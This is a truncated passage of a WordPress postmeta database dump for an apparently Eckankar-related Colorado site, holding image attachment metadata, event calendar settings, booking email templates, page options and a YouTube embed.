\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1361,25073,'_wp_attached_file','2019/07/eck-books-bgrid-1.png'),(1362,25073,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:231;s:6:\"height\";i:154;s:4:\"file\";s:29:\"2019/07/eck-books-bgrid-1.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"eck-books-bgrid-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"eck-books-bgrid-1-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:29:\"eck-books-bgrid-1-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(193699,269204,'_field_649',''),(167909,267041,'mec_currency','a:0:{}'),(167908,267041,'mec_cost',''),(167907,267041,'mec_more_info_target','_self'),(167906,267041,'mec_more_info_title',''),(144934,265277,'_wp_attached_file','2021/08/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1.jpg'),(144935,265277,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:950;s:6:\"height\";i:400;s:4:\"file\";s:102:\"2021/08/ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-300x126.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:126;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-768x323.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:323;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:102:\"ixlibrb-0.3.5q80fmjpgcropentropycstinysrgbw950h400fitcropsd9b735620bb0c87b7bfff6de708d97a1-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1367,26200,'_wp_attached_file','2019/07/upcoming-seminars-bgrid-2.png'),(1368,26200,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:231;s:6:\"height\";i:154;s:4:\"file\";s:37:\"2019/07/upcoming-seminars-bgrid-2.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"upcoming-seminars-bgrid-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"upcoming-seminars-bgrid-2-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"upcoming-seminars-bgrid-2-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1369,26249,'_wp_attached_file','2019/07/esc-blog-bgrid-3.png'),(1370,26249,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:231;s:6:\"height\";i:154;s:4:\"file\";s:28:\"2019/07/esc-blog-bgrid-3.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"esc-blog-bgrid-3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:26:\"esc-blog-bgrid-3-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:28:\"esc-blog-bgrid-3-210x150.png\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10582,123039,'_wp_attached_file','2019/08/spex-accord-5.jpg'),(10583,123039,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:183;s:6:\"height\";i:246;s:4:\"file\";s:25:\"2019/08/spex-accord-5.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"spex-accord-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"spex-accord-5-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-5-134x180.jpg\";s:5:\"width\";i:134;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-5-183x150.jpg\";s:5:\"width\";i:183;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10580,123038,'_wp_attached_file','2019/08/spex-accord-4.jpg'),(10581,123038,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:186;s:6:\"height\";i:248;s:4:\"file\";s:25:\"2019/08/spex-accord-4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"spex-accord-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"spex-accord-4-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-4-135x180.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-4-186x150.jpg\";s:5:\"width\";i:186;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1508,28862,'_wp_attached_file','2019/07/ek-logo-white-med.png'),(1509,28862,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:106;s:6:\"height\";i:105;s:4:\"file\";s:29:\"2019/07/ek-logo-white-med.png\";s:5:\"sizes\";a:1:{s:6:\"wcicon\";a:4:{s:4:\"file\";s:27:\"ek-logo-white-med-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1519,7172,'_edit_lock','1618420884:2'),(1520,7172,'_edit_last','2'),(1521,7172,'boldgrid_hide_page_title','0'),(1522,7172,'bgseo_robots_index','index'),(1523,7172,'bgseo_robots_follow','follow'),(1541,7162,'_edit_lock','1677025729:15'),(1542,7174,'_edit_lock','1599587037:2'),(1547,7172,'_wpac_members_redirect_to',''),(1548,7172,'_wpac_show_in_search','0'),(1549,7172,'_wpac_show_excerpt_in_search','0'),(1550,7172,'_wpac_nonmembers_redirect_to',''),(194029,269258,'_form_id','61'),(194028,269258,'_field_649',''),(194011,269254,'_form_id','61'),(194012,269254,'_seq_num','93'),(194013,68102,'_gglstmp_meta_canonical_tag',''),(143797,265166,'mec_end_time_minutes','0'),(143796,265166,'mec_end_time_hour','4'),(143795,265166,'mec_end_date','2021-07-19'),(143794,265166,'mec_start_day_seconds','54000'),(143793,265166,'mec_start_time_ampm','PM'),(143792,265166,'mec_start_time_minutes','0'),(143791,265166,'mec_start_time_hour','3'),(143790,265166,'mec_start_date','2021-07-19'),(143789,265166,'mec_organizer_id','1'),(143787,265166,'mec_location_id','119'),(143788,265166,'mec_dont_show_map','1'),(143850,265166,'mec_notifications','a:5:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:20:\"booking_confirmation\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"Your booking is confirmed.\";s:7:\"content\";s:243:\"<p>Hi %%name%%,</p>\r\n<p>Your booking is confirmed. You should be available at %%book_date%% in %%event_location_address%%.</p>\r\n<p>You can contact to event organizer by calling %%event_organizer_tel%%.</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:14:\"event_finished\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(143900,265198,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-07-07\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-07-07\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(143899,265198,'mec_end_day_seconds','72000'),(143898,265198,'mec_end_time_ampm','PM'),(143897,265198,'mec_end_time_minutes','0'),(143896,265198,'mec_end_time_hour','8'),(1602,31882,'_edit_last','2'),(1603,31882,'_wp_page_template','default'),(1604,31882,'_wpac_members_redirect_to',''),(1605,31882,'_wpac_show_in_search','0'),(1606,31882,'_wpac_show_excerpt_in_search','0'),(1607,31882,'_wpac_nonmembers_redirect_to',''),(1608,31882,'boldgrid_hide_page_title','0'),(1609,31882,'boldgrid_in_page_containers','1'),(1610,31882,'bgseo_robots_index','index'),(1611,31882,'bgseo_robots_follow','follow'),(1612,31882,'_edit_lock','1680712191:2'),(146748,265639,'mec_read_more',''),(146747,265639,'mec_organizer_id','1'),(146746,265639,'mec_more_info_title',''),(146745,265639,'mec_more_info_target','_self'),(146744,265639,'mec_cost',''),(146743,265639,'mec_additional_location_ids','a:0:{}'),(1624,32074,'_edit_last','2'),(1625,32074,'_wp_page_template','default'),(1626,32074,'_wpac_members_redirect_to',''),(1627,32074,'_wpac_show_in_search','0'),(1628,32074,'_wpac_show_excerpt_in_search','0'),(1629,32074,'_wpac_nonmembers_redirect_to',''),(1630,32074,'boldgrid_hide_page_title','0'),(1631,32074,'boldgrid_in_page_containers','1'),(1632,32074,'bgseo_robots_index','index'),(1633,32074,'bgseo_robots_follow','follow'),(1634,32074,'_edit_lock','1679509937:2'),(1635,32170,'_edit_last','2'),(1636,32170,'_edit_lock','1679510358:2'),(1637,32170,'_wp_page_template','default'),(1638,32170,'_wpac_members_redirect_to',''),(1639,32170,'_wpac_show_in_search','0'),(1640,32170,'_wpac_show_excerpt_in_search','0'),(1641,32170,'_wpac_nonmembers_redirect_to',''),(1642,32170,'boldgrid_hide_page_title','0'),(1643,32170,'boldgrid_in_page_containers','1'),(1644,32170,'bgseo_robots_index','index'),(1645,32170,'bgseo_robots_follow','follow'),(143846,265166,'mec_display_cancellation_reason_in_single_page',''),(143845,265166,'mec_cancelled_reason',''),(143844,265166,'mec_moved_online_link',''),(143843,265166,'mec_event_status','EventScheduled'),(143842,265166,'mec_fields','a:0:{}'),(143841,265166,'mec_bfixed_fields','a:0:{}'),(143840,265166,'mec_public','1'),(143839,265166,'mec_countdown_method','global'),(143837,265166,'one_occurrence','0'),(143838,265166,'mec_timezone','global'),(143879,265197,'_field_36','CO'),(143878,265197,'_field_35','Aurora'),(143877,265197,'_field_34','12602 E. Baker Place'),(168197,267087,'mec_transaction_id','BGC17641'),(168229,267092,'mec_currency','a:0:{}'),(168195,267037,'_oembed_17282f16a653c991eb4e3d6f9f01f652','<iframe title=\"Eckankar Youth: Just Sing HU! - Ancient Spiritual Exercise\" width=\"420\" height=\"315\" src=\"https://www.youtube.com/embed/wc9N_g2NolA?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen></iframe>'),(143941,265198,'mec_bfixed_fields','a:0:{}'),(143940,265198,'mec_public','1'),(143939,265198,'mec_countdown_method','global'),(143938,265198,'mec_timezone','global'),(143937,265198,'one_occurrence','0'),(143936,265198,'mec_additional_location_ids','a:0:{}'),(143935,265198,'mec_additional_organizer_ids','a:0:{}'),(1692,33265,'_edit_last','2'),(1693,33265,'_edit_lock','1596727538:2'),(1694,33265,'_wp_page_template','default'),(1695,33265,'_wpac_members_redirect_to',''),(1696,33265,'_wpac_show_in_search','0'),(1697,33265,'_wpac_show_excerpt_in_search','0'),(1698,33265,'_wpac_nonmembers_redirect_to',''),(1699,33265,'boldgrid_hide_page_title','0'),(1700,33265,'boldgrid_in_page_containers','1'),(1701,33265,'bgseo_robots_index','index'),(1702,33265,'bgseo_robots_follow','follow'),(1703,33361,'_edit_last','2'),(1704,33361,'_edit_lock','1596727453:2'),(1705,33361,'_wp_page_template','default'),(1706,33361,'_wpac_members_redirect_to',''),(1707,33361,'_wpac_show_in_search','0'),(1708,33361,'_wpac_show_excerpt_in_search','0'),(1709,33361,'_wpac_nonmembers_redirect_to',''),(1710,33361,'boldgrid_hide_page_title','0'),(1711,33361,'boldgrid_in_page_containers','1'),(1712,33361,'bgseo_robots_index','noindex'),(1713,33361,'bgseo_robots_follow','nofollow'),(1714,33457,'_edit_last','2'),(1715,33457,'_edit_lock','1692466215:2'),(1716,33457,'_wp_page_template','default'),(1717,33457,'_wpac_is_members_only','true'),(1718,33457,'_wpac_members_redirect_to',''),(1719,33457,'_wpac_show_in_search','0'),(1720,33457,'_wpac_show_excerpt_in_search','0'),(1721,33457,'_wpac_nonmembers_redirect_to',''),(1722,33457,'boldgrid_hide_page_title','0'),(1723,33457,'boldgrid_in_page_containers','1'),(1724,33457,'bgseo_robots_index','index'),(1725,33457,'bgseo_robots_follow','follow'),(1726,33553,'_edit_last','2'),(1727,33553,'_edit_lock','1662497129:2'),(1728,33553,'_wp_page_template','default'),(1729,33553,'_wpac_is_members_only','true'),(1730,33553,'_wpac_members_redirect_to',''),(1731,33553,'_wpac_show_in_search','0'),(1732,33553,'_wpac_show_excerpt_in_search','0'),(1733,33553,'_wpac_nonmembers_redirect_to',''),(1734,33553,'boldgrid_hide_page_title','0'),(1735,33553,'boldgrid_in_page_containers','1'),(1736,33553,'bgseo_robots_index','index'),(1737,33553,'bgseo_robots_follow','follow'),(1748,33265,'_wpac_is_members_only','true'),(168202,267087,'mec_confirmed','1'),(1750,33361,'_wpac_is_members_only','true'),(1752,7162,'_edit_last','2'),(1753,7174,'_edit_last','2'),(10832,125658,'_wp_attached_file','2019/08/ECK_Temple_CO_008-lg.jpg'),(10830,125657,'_wp_attached_file','2019/08/ECK_Temple_CO_007-lg.jpg'),(10831,125657,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_007-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_007-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_007-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1443634231\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.28\";s:3:\"iso\";s:2:\"50\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1770,7162,'_wpac_members_redirect_to',''),(1771,7162,'_wpac_show_in_search','0'),(1772,7162,'_wpac_show_excerpt_in_search','0'),(1773,7162,'_wpac_nonmembers_redirect_to',''),(1774,7162,'boldgrid_hide_page_title','0'),(1775,7162,'bgseo_robots_index','index'),(1776,7162,'bgseo_robots_follow','follow'),(6674,80323,'_wp_attached_file','2019/08/water-rocks-2.jpg'),(6675,80323,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1080;s:4:\"file\";s:25:\"2019/08/water-rocks-2.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"water-rocks-2-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"water-rocks-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:25:\"water-rocks-2-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:26:\"water-rocks-2-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10840,125662,'_wp_attached_file','2019/08/ECK_Temple_CO_013-lg.jpg'),(10841,125662,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:348;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_013-lg.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_013-lg-348x250.jpg\";s